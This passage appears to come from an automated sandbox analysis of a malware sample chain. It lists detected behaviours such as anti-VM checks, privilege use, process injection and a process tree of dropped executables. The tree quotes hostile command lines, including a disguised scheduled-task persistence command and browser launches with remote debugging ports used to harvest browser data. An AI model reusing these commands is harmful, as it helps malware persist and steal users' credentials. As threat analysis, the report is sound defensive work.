Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
13000	timeout.exe
5288	timeout.exe
544	timeout.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
5436	taskkill.exe
5604	taskkill.exe
860	taskkill.exe
3544	taskkill.exe
3488	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133866532978599111"	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2496	SCHTASKS.exe
5364	schtasks.exe
504	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5672	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
5672	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
632	rapes.exe
632	rapes.exe
2968	powershell.exe
2968	powershell.exe
6116	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
6116	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
1368	powershell.exe
1368	powershell.exe
2088	powershell.exe
2088	powershell.exe
2252	powershell.exe
2252	powershell.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
4016	powershell.exe
4016	powershell.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
3436	9078a8a5bd.exe
3976	483d2fa8a0d53818306efeb32d3.exe
3976	483d2fa8a0d53818306efeb32d3.exe
3696	rapes.exe
3696	rapes.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
1020	7839a22f78.exe
5356	cronikxqqq.exe
5356	cronikxqqq.exe
5356	cronikxqqq.exe
5356	cronikxqqq.exe
5356	cronikxqqq.exe
5356	cronikxqqq.exe
5356	cronikxqqq.exe
5356	cronikxqqq.exe
2824	3ca9ad24eb.exe
2824	3ca9ad24eb.exe
2824	3ca9ad24eb.exe
2824	3ca9ad24eb.exe
5932	TK5GI6UDIAI28SA1401E.exe
5932	TK5GI6UDIAI28SA1401E.exe
2824	3ca9ad24eb.exe
2824	3ca9ad24eb.exe
2424	chrome.exe
2424	chrome.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
4952	MSBuild.exe
4952	MSBuild.exe
5336	df0bb5d7c6.exe
5336	df0bb5d7c6.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
5716	msedge.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeImpersonatePrivilege	3436	9078a8a5bd.exe
Token: SeImpersonatePrivilege	3436	9078a8a5bd.exe
Token: SeImpersonatePrivilege	1020	7839a22f78.exe
Token: SeImpersonatePrivilege	1020	7839a22f78.exe
Token: SeDebugPrivilege	748	cronikxqqq.exe
Token: SeImpersonatePrivilege	5356	cronikxqqq.exe
Token: SeImpersonatePrivilege	5356	cronikxqqq.exe
Token: SeShutdownPrivilege	2424	chrome.exe
Token: SeCreatePagefilePrivilege	2424	chrome.exe
Token: SeShutdownPrivilege	2424	chrome.exe
Token: SeCreatePagefilePrivilege	2424	chrome.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeShutdownPrivilege	2424	chrome.exe
Token: SeCreatePagefilePrivilege	2424	chrome.exe
Token: SeShutdownPrivilege	2424	chrome.exe
Token: SeCreatePagefilePrivilege	2424	chrome.exe
Token: SeDebugPrivilege	5604	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3740	firefox.exe
Token: SeDebugPrivilege	3740	firefox.exe

Suspicious use of FindShellTrayWindow 60 IoCs

pid	Process
5672	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
1396	cfce26c921.exe
1396	cfce26c921.exe
1396	cfce26c921.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
3740	firefox.exe
5244	c182c36c7f.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
5244	c182c36c7f.exe
3740	firefox.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5716	msedge.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
1396	cfce26c921.exe
1396	cfce26c921.exe
1396	cfce26c921.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
3740	firefox.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe
5244	c182c36c7f.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3740	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5672 wrote to memory of 632	5672	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe	87
PID 5672 wrote to memory of 632	5672	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe	87
PID 5672 wrote to memory of 632	5672	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe	87
PID 632 wrote to memory of 4524	632	rapes.exe	88
PID 632 wrote to memory of 4524	632	rapes.exe	88
PID 632 wrote to memory of 4524	632	rapes.exe	88
PID 4524 wrote to memory of 4656	4524	amnew.exe	89
PID 4524 wrote to memory of 4656	4524	amnew.exe	89
PID 4524 wrote to memory of 4656	4524	amnew.exe	89
PID 632 wrote to memory of 1396	632	rapes.exe	90
PID 632 wrote to memory of 1396	632	rapes.exe	90
PID 632 wrote to memory of 1396	632	rapes.exe	90
PID 1396 wrote to memory of 4968	1396	cfce26c921.exe	91
PID 1396 wrote to memory of 4968	1396	cfce26c921.exe	91
PID 1396 wrote to memory of 4968	1396	cfce26c921.exe	91
PID 1396 wrote to memory of 4720	1396	cfce26c921.exe	92
PID 1396 wrote to memory of 4720	1396	cfce26c921.exe	92
PID 1396 wrote to memory of 4720	1396	cfce26c921.exe	92
PID 4968 wrote to memory of 5364	4968	cmd.exe	94
PID 4968 wrote to memory of 5364	4968	cmd.exe	94
PID 4968 wrote to memory of 5364	4968	cmd.exe	94
PID 4720 wrote to memory of 2968	4720	mshta.exe	95
PID 4720 wrote to memory of 2968	4720	mshta.exe	95
PID 4720 wrote to memory of 2968	4720	mshta.exe	95
PID 632 wrote to memory of 1876	632	rapes.exe	97
PID 632 wrote to memory of 1876	632	rapes.exe	97
PID 632 wrote to memory of 1876	632	rapes.exe	97
PID 1876 wrote to memory of 5288	1876	cmd.exe	99
PID 1876 wrote to memory of 5288	1876	cmd.exe	99
PID 1876 wrote to memory of 5288	1876	cmd.exe	99
PID 2968 wrote to memory of 6116	2968	powershell.exe	100
PID 2968 wrote to memory of 6116	2968	powershell.exe	100
PID 2968 wrote to memory of 6116	2968	powershell.exe	100
PID 1876 wrote to memory of 1648	1876	cmd.exe	101
PID 1876 wrote to memory of 1648	1876	cmd.exe	101
PID 1876 wrote to memory of 1648	1876	cmd.exe	101
PID 1648 wrote to memory of 1368	1648	cmd.exe	102
PID 1648 wrote to memory of 1368	1648	cmd.exe	102
PID 1648 wrote to memory of 1368	1648	cmd.exe	102
PID 1876 wrote to memory of 2032	1876	cmd.exe	103
PID 1876 wrote to memory of 2032	1876	cmd.exe	103
PID 1876 wrote to memory of 2032	1876	cmd.exe	103
PID 2032 wrote to memory of 2088	2032	cmd.exe	104
PID 2032 wrote to memory of 2088	2032	cmd.exe	104
PID 2032 wrote to memory of 2088	2032	cmd.exe	104
PID 1876 wrote to memory of 384	1876	cmd.exe	105
PID 1876 wrote to memory of 384	1876	cmd.exe	105
PID 1876 wrote to memory of 384	1876	cmd.exe	105
PID 384 wrote to memory of 2252	384	cmd.exe	106
PID 384 wrote to memory of 2252	384	cmd.exe	106
PID 384 wrote to memory of 2252	384	cmd.exe	106
PID 1876 wrote to memory of 504	1876	cmd.exe	107
PID 1876 wrote to memory of 504	1876	cmd.exe	107
PID 1876 wrote to memory of 504	1876	cmd.exe	107
PID 1876 wrote to memory of 4928	1876	cmd.exe	109
PID 1876 wrote to memory of 4928	1876	cmd.exe	109
PID 1876 wrote to memory of 4928	1876	cmd.exe	109
PID 632 wrote to memory of 3436	632	rapes.exe	108
PID 632 wrote to memory of 3436	632	rapes.exe	108
PID 632 wrote to memory of 3436	632	rapes.exe	108
PID 4928 wrote to memory of 4016	4928	mshta.exe	110
PID 4928 wrote to memory of 4016	4928	mshta.exe	110
PID 4928 wrote to memory of 4016	4928	mshta.exe	110
PID 4016 wrote to memory of 3976	4016	powershell.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
"C:\Users\Admin\AppData\Local\Temp\53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5672
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Users\Admin\AppData\Local\Temp\10238250101\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\10238250101\amnew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4524
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4656
    - - C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        5⤵
        Executes dropped EXE
        
        PID:4340
      - C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2984
    - - C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:748
      - C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5356
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 812
        6⤵
        Program crash
        
        PID:384
    - - C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3952
      - C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2496
    - - C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3560
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:3000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffad742dcf8,0x7ffad742dd04,0x7ffad742dd10
        8⤵
        
        PID:2724
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1528,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2504 /prefetch:3
        8⤵
        
        PID:6640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2424,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2416 /prefetch:2
        8⤵
        
        PID:6648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2076,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2568 /prefetch:8
        8⤵
        
        PID:6656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3284 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3312 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4228,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4260 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:6944
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4620,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4640 /prefetch:8
        8⤵
        
        PID:7140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4612,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4660 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:7148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4940,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4952 /prefetch:8
        8⤵
        
        PID:6328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5308,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5312 /prefetch:8
        8⤵
        
        PID:7140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5496,i,1827220808530359714,629077168849046325,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5304 /prefetch:8
        8⤵
        
        PID:6328
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:6540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x250,0x7ffad974f208,0x7ffad974f214,0x7ffad974f220
        8⤵
        
        PID:3544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1912,i,18207132004355205026,18335209739592143118,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
        8⤵
        
        PID:4436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2148,i,18207132004355205026,18335209739592143118,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:2
        8⤵
        
        PID:6660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2464,i,18207132004355205026,18335209739592143118,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8
        8⤵
        
        PID:4736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3564,i,18207132004355205026,18335209739592143118,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3572,i,18207132004355205026,18335209739592143118,262144 --variations-seed-version --mojo-platform-channel-handle=3644 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:848
        
        C:\ProgramData\dt0r1db1ny.exe
        
        "C:\ProgramData\dt0r1db1ny.exe"
        7⤵
        
        PID:5732
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:912
        
        C:\ProgramData\d2dbi5pph4.exe
        
        "C:\ProgramData\d2dbi5pph4.exe"
        7⤵
        
        PID:7096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:6840
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        9⤵
        Uses browser remote debugging
        
        PID:7392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffad963dcf8,0x7ffad963dd04,0x7ffad963dd10
        10⤵
        
        PID:7172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1576,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:3
        10⤵
        
        PID:19132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2420,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:2
        10⤵
        
        PID:19120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2080,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=2756 /prefetch:8
        10⤵
        
        PID:19092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:18784
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
